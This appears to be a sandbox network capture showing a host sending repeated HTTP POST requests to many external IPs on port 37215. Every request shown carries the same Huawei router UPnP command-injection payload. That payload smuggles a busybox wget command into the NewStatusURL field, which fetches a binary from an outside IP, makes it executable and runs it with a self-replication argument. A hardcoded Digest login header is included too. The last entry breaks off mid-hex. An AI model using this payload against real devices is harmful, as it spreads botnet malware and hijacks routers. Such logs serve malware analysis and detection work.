                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1616192.168.2.134512041.226.246.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.589971066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1617192.168.2.134934241.59.152.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.590660095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1618192.168.2.1349726197.230.162.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.590971947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1619192.168.2.1350672172.212.208.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.591037035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1620192.168.2.1339972157.153.79.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.591090918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1621192.168.2.135829041.122.37.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.591149092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1622192.168.2.1357268157.20.59.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.591172934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1623192.168.2.135087441.238.146.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593391895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1624192.168.2.1350628197.167.141.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593472004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1625192.168.2.1352890197.212.120.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593501091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 